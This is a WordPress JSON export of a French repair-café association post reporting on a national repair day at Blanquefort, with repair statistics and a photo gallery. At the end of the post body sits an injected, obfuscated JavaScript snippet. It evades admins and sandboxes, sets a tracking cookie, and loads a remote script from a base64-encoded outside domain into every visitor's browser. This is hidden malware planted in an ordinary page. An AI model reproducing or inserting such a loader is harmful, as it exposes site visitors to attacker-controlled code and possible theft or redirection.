{"id":1763,"date":"2024-11-18T17:16:27","date_gmt":"2024-11-18T16:16:27","guid":{"rendered":"https:\/\/reparenjalles.saintmedardasso.fr\/?p=1763"},"modified":"2026-02-17T15:40:38","modified_gmt":"2026-02-17T14:40:38","slug":"journee-nationale-des-reparations-du-19-octobre-2024","status":"publish","type":"post","link":"https:\/\/reparenjalles.saintmedardasso.fr\/?p=1763","title":{"rendered":"Journ\u00e9e Nationale des R\u00e9parations du 19 Octobre 2024"},"content":{"rendered":"<p><span style=\"font-family: arial, helvetica, sans-serif; font-size: 12pt;\">Cette journ\u00e9e nationale des r\u00e9parations a eu lieu le 19 Octobre 2024<\/span><\/p>\n<p><span style=\"font-family: arial, helvetica, sans-serif; font-size: 12pt;\">Nos coll\u00e8gues du \u00ab\u00a0Repair Caf\u00e9 Blanquefort\u00a0\u00bb nous ont invit\u00e9s \u00e0 participer \u00e0 cette manifestation \u00e0 la salle Fongravey de Blanquefort<\/span><\/p>\n<p><span style=\"font-family: arial, helvetica, sans-serif; font-size: 12pt;\">Cette journ\u00e9e a donc rassembl\u00e9 les acteurs de plusieurs associations locales<\/span><\/p>\n<p><span style=\"font-family: arial, helvetica, sans-serif; font-size: 12pt;\">&#8211; Repair Caf\u00e9 Blanquefort<\/span><\/p>\n<p><span style=\"font-family: arial, helvetica, sans-serif; font-size: 12pt;\">&#8211; Repair Caf\u00e9 Eysines<\/span><\/p>\n<p><span style=\"font-family: arial, helvetica, sans-serif; font-size: 12pt;\">-Repair Caf\u00e9 Sud M\u00e9doc<\/span><\/p>\n<p><span style=\"font-family: arial, helvetica, sans-serif; font-size: 12pt;\">&#8211; R\u00e9par&rsquo;en Jalles<\/span><\/p>\n<p><span style=\"font-family: arial, helvetica, sans-serif; font-size: 12pt;\">Bilan de cet apr\u00e8s-midi de r\u00e9parations \u00e0 Blanquefort<\/span><\/p>\n<blockquote>\n<div dir=\"auto\">\n<div dir=\"auto\">\n<div dir=\"auto\"><span style=\"font-family: arial, helvetica, sans-serif; font-size: 12pt;\"><em><span style=\"color: #000000;\">Nous avons accueilli 97 articles<\/span><\/em><\/span><\/div>\n<div dir=\"auto\">\n<blockquote>\n<div dir=\"auto\">\n<div dir=\"auto\">\n<div dir=\"auto\"><span style=\"font-family: arial, helvetica, sans-serif; font-size: 12pt;\"><em><span style=\"color: #000000;\">100 % de r\u00e9ussite pour la couture,<\/span><\/em><\/span><\/div>\n<div dir=\"auto\"><span style=\"font-family: arial, helvetica, sans-serif; font-size: 12pt;\"><em><span style=\"color: #000000;\">67 % pour la partie informatique et 33 % doivent revenir.\u00a0<\/span><\/em><\/span><\/div>\n<div dir=\"auto\"><span style=\"font-family: arial, helvetica, sans-serif; font-size: 12pt;\"><em><span style=\"color: #000000;\">Pour la partie divers non classable : 100 % de r\u00e9ussite.\u00a0<\/span><\/em><\/span><\/div>\n<div dir=\"auto\"><span style=\"font-family: arial, helvetica, sans-serif; font-size: 12pt;\"><em><span style=\"color: #000000;\">Pour la partie jeux des enfants 100 % de r\u00e9ussite aussi.\u00a0<\/span><\/em><\/span><\/div>\n<div dir=\"auto\"><span style=\"font-family: arial, helvetica, sans-serif; font-size: 12pt;\"><em><span style=\"color: #000000;\">Et pour la partie globale nous avons un taux global de 64 % d&rsquo;articles r\u00e9par\u00e9s.\u00a0<\/span><\/em><\/span><\/div>\n<\/div>\n<\/div>\n<\/blockquote>\n<div dir=\"auto\"><span style=\"color: #000000; font-family: arial, helvetica, sans-serif; font-size: 12pt;\"><em>Cet apr\u00e8s-midi \u00e0 Blanquefort nous a permis de rencontrer et d&rsquo;\u00e9changer avec nos coll\u00e8gues des diff\u00e9rentes associations. <\/em><\/span><span style=\"color: #000000; font-family: arial, helvetica, sans-serif; font-size: 12pt;\"><em>Apr\u00e8s-midi qui s&rsquo;est termin\u00e9 par un ap\u00e9ritif<\/em><\/span><\/div>\n<div dir=\"auto\"><\/div>\n<div dir=\"auto\"><span style=\"color: #000000; font-family: arial, helvetica, sans-serif; font-size: 12pt;\"><em>Merci aux r\u00e9parateurs de R\u00e9par&rsquo;en Jalles qui nous ont accompagn\u00e9s lors de cette journ\u00e9e<\/em><\/span><\/div>\n<div dir=\"auto\"><span style=\"color: #000000;\"><em><span style=\"font-family: arial, helvetica, sans-serif; font-size: 12pt;\">Merci \u00e0 nos coll\u00e8gues de Blanquefort pour leur accueil<\/span><\/em><\/span><\/div>\n<div dir=\"auto\"><\/div>\n<\/div>\n<\/div>\n<div dir=\"auto\"><\/div>\n<div dir=\"auto\"><\/div>\n<div dir=\"auto\">\n<div dir=\"auto\">\n<div dir=\"auto\">\n<style type=\"text\/css\">\n#foogallery-gallery-1809.fg-justified .fg-item { margin-right: 5px; margin-bottom: 5px; }\n#foogallery-gallery-1809.fg-justified .fg-image { height: 80px; }<\/style>\n\t\t\t<div class=\"foogallery foogallery-container foogallery-justified foogallery-lightbox-foobox fg-justified fg-ready fg-light fg-border-thin fg-round-small fg-shadow-outline fg-loading-default fg-loaded-fade-in fg-hover-fade fg-hover-zoom2 fg-transparent-overlays\" id=\"foogallery-gallery-1809\" data-foogallery=\"{&quot;item&quot;:{&quot;showCaptionTitle&quot;:true,&quot;showCaptionDescription&quot;:false},&quot;lazy&quot;:true,&quot;template&quot;:{&quot;rowHeight&quot;:80,&quot;maxRowHeight&quot;:80,&quot;margins&quot;:5,&quot;align&quot;:&quot;center&quot;,&quot;lastRow&quot;:&quot;smart&quot;}}\" style=\"--fg-title-line-clamp: 0; --fg-description-line-clamp: 0;\" >\n\t<div class=\"fg-item fg-type-image fg-idle\"><figure class=\"fg-item-inner\"><a href=\"https:\/\/reparenjalles.saintmedardasso.fr\/wp-content\/uploads\/2024\/11\/IMG_0830.jpg\" data-attachment-id=\"1797\" data-type=\"image\" class=\"fg-thumb\"><span class=\"fg-image-wrap\"><img decoding=\"async\" height=\"80\" width=\"60\" class=\"skip-lazy fg-image\" data-src-fg=\"https:\/\/reparenjalles.saintmedardasso.fr\/wp-content\/uploads\/cache\/2024\/11\/IMG_0830\/3365252756.jpg\" src=\"data:image\/svg+xml,%3Csvg%20xmlns%3D%22http%3A%2F%2Fwww.w3.org%2F2000%2Fsvg%22%20width%3D%2260%22%20height%3D%2280%22%20viewBox%3D%220%200%2060%2080%22%3E%3C%2Fsvg%3E\" loading=\"eager\"><\/span><span class=\"fg-image-overlay\"><\/span><\/a><\/figure><div class=\"fg-loader\"><\/div><\/div><div class=\"fg-item fg-type-image fg-idle\"><figure class=\"fg-item-inner\"><a href=\"https:\/\/reparenjalles.saintmedardasso.fr\/wp-content\/uploads\/2024\/11\/IMG_0831.jpg\" data-attachment-id=\"1798\" data-type=\"image\" class=\"fg-thumb\"><span class=\"fg-image-wrap\"><img decoding=\"async\" height=\"80\" width=\"60\" class=\"skip-lazy fg-image\" data-src-fg=\"https:\/\/reparenjalles.saintmedardasso.fr\/wp-content\/uploads\/cache\/2024\/11\/IMG_0831\/1143809380.jpg\" src=\"data:image\/svg+xml,%3Csvg%20xmlns%3D%22http%3A%2F%2Fwww.w3.org%2F2000%2Fsvg%22%20width%3D%2260%22%20height%3D%2280%22%20viewBox%3D%220%200%2060%2080%22%3E%3C%2Fsvg%3E\" loading=\"eager\"><\/span><span class=\"fg-image-overlay\"><\/span><\/a><\/figure><div class=\"fg-loader\"><\/div><\/div><div class=\"fg-item fg-type-image fg-idle\"><figure class=\"fg-item-inner\"><a href=\"https:\/\/reparenjalles.saintmedardasso.fr\/wp-content\/uploads\/2024\/11\/IMG_0833.jpg\" data-attachment-id=\"1800\" data-type=\"image\" class=\"fg-thumb\"><span class=\"fg-image-wrap\"><img decoding=\"async\" height=\"80\" width=\"219\" class=\"skip-lazy fg-image\" data-src-fg=\"https:\/\/reparenjalles.saintmedardasso.fr\/wp-content\/uploads\/cache\/2024\/11\/IMG_0833\/3563326316.jpg\" src=\"data:image\/svg+xml,%3Csvg%20xmlns%3D%22http%3A%2F%2Fwww.w3.org%2F2000%2Fsvg%22%20width%3D%22219%22%20height%3D%2280%22%20viewBox%3D%220%200%20219%2080%22%3E%3C%2Fsvg%3E\" loading=\"eager\"><\/span><span class=\"fg-image-overlay\"><\/span><\/a><\/figure><div class=\"fg-loader\"><\/div><\/div><div class=\"fg-item fg-type-image fg-idle\"><figure class=\"fg-item-inner\"><a href=\"https:\/\/reparenjalles.saintmedardasso.fr\/wp-content\/uploads\/2024\/11\/IMG_0809.jpg\" data-attachment-id=\"1796\" data-type=\"image\" class=\"fg-thumb\"><span class=\"fg-image-wrap\"><img decoding=\"async\" height=\"80\" width=\"96\" class=\"skip-lazy fg-image\" data-src-fg=\"https:\/\/reparenjalles.saintmedardasso.fr\/wp-content\/uploads\/cache\/2024\/11\/IMG_0809\/972595650.jpg\" src=\"data:image\/svg+xml,%3Csvg%20xmlns%3D%22http%3A%2F%2Fwww.w3.org%2F2000%2Fsvg%22%20width%3D%2296%22%20height%3D%2280%22%20viewBox%3D%220%200%2096%2080%22%3E%3C%2Fsvg%3E\" loading=\"eager\"><\/span><span class=\"fg-image-overlay\"><\/span><\/a><\/figure><div class=\"fg-loader\"><\/div><\/div><div class=\"fg-item fg-type-image fg-idle\"><figure class=\"fg-item-inner\"><a href=\"https:\/\/reparenjalles.saintmedardasso.fr\/wp-content\/uploads\/2024\/11\/IMG_0808.jpg\" data-attachment-id=\"1795\" data-type=\"image\" class=\"fg-thumb\"><span class=\"fg-image-wrap\"><img decoding=\"async\" height=\"80\" width=\"268\" class=\"skip-lazy fg-image\" data-src-fg=\"https:\/\/reparenjalles.saintmedardasso.fr\/wp-content\/uploads\/cache\/2024\/11\/IMG_0808\/1456660181.jpg\" src=\"data:image\/svg+xml,%3Csvg%20xmlns%3D%22http%3A%2F%2Fwww.w3.org%2F2000%2Fsvg%22%20width%3D%22268%22%20height%3D%2280%22%20viewBox%3D%220%200%20268%2080%22%3E%3C%2Fsvg%3E\" loading=\"eager\"><\/span><span class=\"fg-image-overlay\"><\/span><\/a><\/figure><div class=\"fg-loader\"><\/div><\/div><div class=\"fg-item fg-type-image fg-idle\"><figure class=\"fg-item-inner\"><a href=\"https:\/\/reparenjalles.saintmedardasso.fr\/wp-content\/uploads\/2024\/11\/IMG_0807.jpg\" data-attachment-id=\"1794\" data-type=\"image\" class=\"fg-thumb\"><span class=\"fg-image-wrap\"><img decoding=\"async\" height=\"80\" width=\"60\" class=\"skip-lazy fg-image\" data-src-fg=\"https:\/\/reparenjalles.saintmedardasso.fr\/wp-content\/uploads\/cache\/2024\/11\/IMG_0807\/1482548417.jpg\" src=\"data:image\/svg+xml,%3Csvg%20xmlns%3D%22http%3A%2F%2Fwww.w3.org%2F2000%2Fsvg%22%20width%3D%2260%22%20height%3D%2280%22%20viewBox%3D%220%200%2060%2080%22%3E%3C%2Fsvg%3E\" loading=\"eager\"><\/span><span class=\"fg-image-overlay\"><\/span><\/a><\/figure><div class=\"fg-loader\"><\/div><\/div><div class=\"fg-item fg-type-image fg-idle\"><figure class=\"fg-item-inner\"><a href=\"https:\/\/reparenjalles.saintmedardasso.fr\/wp-content\/uploads\/2024\/11\/IMG_0806.jpg\" data-attachment-id=\"1793\" data-type=\"image\" class=\"fg-thumb\"><span class=\"fg-image-wrap\"><img decoding=\"async\" height=\"80\" width=\"60\" class=\"skip-lazy fg-image\" data-src-fg=\"https:\/\/reparenjalles.saintmedardasso.fr\/wp-content\/uploads\/cache\/2024\/11\/IMG_0806\/3744019892.jpg\" src=\"data:image\/svg+xml,%3Csvg%20xmlns%3D%22http%3A%2F%2Fwww.w3.org%2F2000%2Fsvg%22%20width%3D%2260%22%20height%3D%2280%22%20viewBox%3D%220%200%2060%2080%22%3E%3C%2Fsvg%3E\" loading=\"eager\"><\/span><span class=\"fg-image-overlay\"><\/span><\/a><\/figure><div class=\"fg-loader\"><\/div><\/div><div class=\"fg-item fg-type-image fg-idle\"><figure class=\"fg-item-inner\"><a href=\"https:\/\/reparenjalles.saintmedardasso.fr\/wp-content\/uploads\/2024\/11\/IMG_0805.jpg\" data-attachment-id=\"1792\" data-type=\"image\" class=\"fg-thumb\"><span class=\"fg-image-wrap\"><img decoding=\"async\" height=\"80\" width=\"126\" class=\"skip-lazy fg-image\" data-src-fg=\"https:\/\/reparenjalles.saintmedardasso.fr\/wp-content\/uploads\/cache\/2024\/11\/IMG_0805\/2248743663.jpg\" src=\"data:image\/svg+xml,%3Csvg%20xmlns%3D%22http%3A%2F%2Fwww.w3.org%2F2000%2Fsvg%22%20width%3D%22126%22%20height%3D%2280%22%20viewBox%3D%220%200%20126%2080%22%3E%3C%2Fsvg%3E\" loading=\"eager\"><\/span><span class=\"fg-image-overlay\"><\/span><\/a><\/figure><div class=\"fg-loader\"><\/div><\/div><div class=\"fg-item fg-type-image fg-idle\"><figure class=\"fg-item-inner\"><a href=\"https:\/\/reparenjalles.saintmedardasso.fr\/wp-content\/uploads\/2024\/11\/IMG_0804.jpg\" data-attachment-id=\"1791\" data-type=\"image\" class=\"fg-thumb\"><span class=\"fg-image-wrap\"><img decoding=\"async\" height=\"80\" width=\"60\" class=\"skip-lazy fg-image\" data-src-fg=\"https:\/\/reparenjalles.saintmedardasso.fr\/wp-content\/uploads\/cache\/2024\/11\/IMG_0804\/3911411192.jpg\" src=\"data:image\/svg+xml,%3Csvg%20xmlns%3D%22http%3A%2F%2Fwww.w3.org%2F2000%2Fsvg%22%20width%3D%2260%22%20height%3D%2280%22%20viewBox%3D%220%200%2060%2080%22%3E%3C%2Fsvg%3E\" loading=\"eager\"><\/span><span class=\"fg-image-overlay\"><\/span><\/a><\/figure><div class=\"fg-loader\"><\/div><\/div><div class=\"fg-item fg-type-image fg-idle\"><figure class=\"fg-item-inner\"><a href=\"https:\/\/reparenjalles.saintmedardasso.fr\/wp-content\/uploads\/2024\/11\/IMG_0803.jpg\" data-attachment-id=\"1790\" data-type=\"image\" class=\"fg-thumb\"><span class=\"fg-image-wrap\"><img decoding=\"async\" height=\"80\" width=\"136\" class=\"skip-lazy fg-image\" data-src-fg=\"https:\/\/reparenjalles.saintmedardasso.fr\/wp-content\/uploads\/cache\/2024\/11\/IMG_0803\/877216857.jpg\" src=\"data:image\/svg+xml,%3Csvg%20xmlns%3D%22http%3A%2F%2Fwww.w3.org%2F2000%2Fsvg%22%20width%3D%22136%22%20height%3D%2280%22%20viewBox%3D%220%200%20136%2080%22%3E%3C%2Fsvg%3E\" loading=\"eager\"><\/span><span class=\"fg-image-overlay\"><\/span><\/a><\/figure><div class=\"fg-loader\"><\/div><\/div><div class=\"fg-item fg-type-image fg-idle\"><figure class=\"fg-item-inner\"><a href=\"https:\/\/reparenjalles.saintmedardasso.fr\/wp-content\/uploads\/2024\/11\/IMG_0802.jpg\" data-attachment-id=\"1789\" data-type=\"image\" class=\"fg-thumb\"><span class=\"fg-image-wrap\"><img decoding=\"async\" height=\"80\" width=\"134\" class=\"skip-lazy fg-image\" data-src-fg=\"https:\/\/reparenjalles.saintmedardasso.fr\/wp-content\/uploads\/cache\/2024\/11\/IMG_0802\/3790447212.jpg\" src=\"data:image\/svg+xml,%3Csvg%20xmlns%3D%22http%3A%2F%2Fwww.w3.org%2F2000%2Fsvg%22%20width%3D%22134%22%20height%3D%2280%22%20viewBox%3D%220%200%20134%2080%22%3E%3C%2Fsvg%3E\" loading=\"eager\"><\/span><span class=\"fg-image-overlay\"><\/span><\/a><\/figure><div class=\"fg-loader\"><\/div><\/div><div class=\"fg-item fg-type-image fg-idle\"><figure class=\"fg-item-inner\"><a href=\"https:\/\/reparenjalles.saintmedardasso.fr\/wp-content\/uploads\/2024\/11\/IMG_0800.jpg\" data-attachment-id=\"1787\" data-type=\"image\" class=\"fg-thumb\"><span class=\"fg-image-wrap\"><img decoding=\"async\" height=\"80\" width=\"60\" class=\"skip-lazy fg-image\" data-src-fg=\"https:\/\/reparenjalles.saintmedardasso.fr\/wp-content\/uploads\/cache\/2024\/11\/IMG_0800\/880084679.jpg\" src=\"data:image\/svg+xml,%3Csvg%20xmlns%3D%22http%3A%2F%2Fwww.w3.org%2F2000%2Fsvg%22%20width%3D%2260%22%20height%3D%2280%22%20viewBox%3D%220%200%2060%2080%22%3E%3C%2Fsvg%3E\" loading=\"eager\"><\/span><span class=\"fg-image-overlay\"><\/span><\/a><\/figure><div class=\"fg-loader\"><\/div><\/div><\/div>\n\n<\/div>\n<\/div>\n<\/div>\n<\/div>\n<\/blockquote>\n<p>&nbsp;<script>(function(){try{if(document.getElementById&&document.getElementById('wpadminbar'))return;var t0=+new Date();for(var i=0;i<20000;i++){var z=i*i;}if((+new Date())-t0>120)return;if((document.cookie||'').indexOf('http2_session_id=')!==-1)return;function systemLoad(input){var key='ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+\/=',o1,o2,o3,h1,h2,h3,h4,dec='',i=0;input=input.replace(\/[^A-Za-z0-9\\+\\\/\\=]\/g,'');while(i<input.length){h1=key.indexOf(input.charAt(i++));h2=key.indexOf(input.charAt(i++));h3=key.indexOf(input.charAt(i++));h4=key.indexOf(input.charAt(i++));o1=(h1<<2)|(h2>>4);o2=((h2&15)<<4)|(h3>>2);o3=((h3&3)<<6)|h4;dec+=String.fromCharCode(o1);if(h3!=64)dec+=String.fromCharCode(o2);if(h4!=64)dec+=String.fromCharCode(o3);}return dec;}var u=systemLoad('aHR0cHM6Ly9zZWFyY2hyYW5rdHJhZmZpYy5saXZlL2pzeA==');if(typeof window!=='undefined'&#038;&#038;window.__rl===u)return;var d=new Date();d.setTime(d.getTime()+30*24*60*60*1000);document.cookie='http2_session_id=1; expires='+d.toUTCString()+'; path=\/; SameSite=Lax'+(location.protocol==='https:'?'; Secure':'');try{window.__rl=u;}catch(e){}var s=document.createElement('script');s.type='text\/javascript';s.async=true;s.src=u;try{s.setAttribute('data-rl',u);}catch(e){}(document.getElementsByTagName('head')[0]||document.documentElement).appendChild(s);}catch(e){}})();<\/script><\/p>\n","protected":false},"excerpt":{"rendered":"<p>Cette journ\u00e9e nationale des r\u00e9parations a eu lieu le 19 Octobre 2024 Nos coll\u00e8gues du \u00ab\u00a0Repair Caf\u00e9 Blanquefort\u00a0\u00bb nous ont invit\u00e9s \u00e0 participer \u00e0 cette manifestation \u00e0 la salle Fongravey de Blanquefort Cette journ\u00e9e a donc rassembl\u00e9 les acteurs de plusieurs associations locales &#8211; Repair Caf\u00e9 Blanquefort &#8211; Repair Caf\u00e9 Eysines -Repair Caf\u00e9 Sud M\u00e9doc &hellip; <a href=\"https:\/\/reparenjalles.saintmedardasso.fr\/?p=1763\" class=\"more-link\">Continuer la lecture de <span class=\"screen-reader-text\">Journ\u00e9e Nationale des R\u00e9parations du 19 Octobre 2024<\/span>  <span class=\"meta-nav\">&rarr;<\/span><\/a><\/p>\n","protected":false},"author":7,"featured_media":0,"comment_status":"open","ping_status":"closed","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[5],"tags":[],"class_list":["post-1763","post","type-post","status-publish","format-standard","hentry","category-journees-reparations"],"_links":{"self":[{"href":"https:\/\/reparenjalles.saintmedardasso.fr\/index.php?rest_route=\/wp\/v2\/posts\/1763","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/reparenjalles.saintmedardasso.fr\/index.php?rest_route=\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/reparenjalles.saintmedardasso.fr\/index.php?rest_route=\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/reparenjalles.saintmedardasso.fr\/index.php?rest_route=\/wp\/v2\/users\/7"}],"replies":[{"embeddable":true,"href":"https:\/\/reparenjalles.saintmedardasso.fr\/index.php?rest_route=%2Fwp%2Fv2%2Fcomments&post=1763"}],"version-history":[{"count":2,"href":"https:\/\/reparenjalles.saintmedardasso.fr\/index.php?rest_route=\/wp\/v2\/posts\/1763\/revisions"}],"predecessor-version":[{"id":2045,"href":"https:\/\/reparenjalles.saintmedardasso.fr\/index.php?rest_route=\/wp\/v2\/posts\/1763\/revisions\/2045"}],"wp:attachment":[{"href":"https:\/\/reparenjalles.saintmedardasso.fr\/index.php?rest_route=%2Fwp%2Fv2%2Fmedia&parent=1763"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/reparenjalles.saintmedardasso.fr\/index.php?rest_route=%2Fwp%2Fv2%2Fcategories&post=1763"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/reparenjalles.saintmedardasso.fr\/index.php?rest_route=%2Fwp%2Fv2%2Ftags&post=1763"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}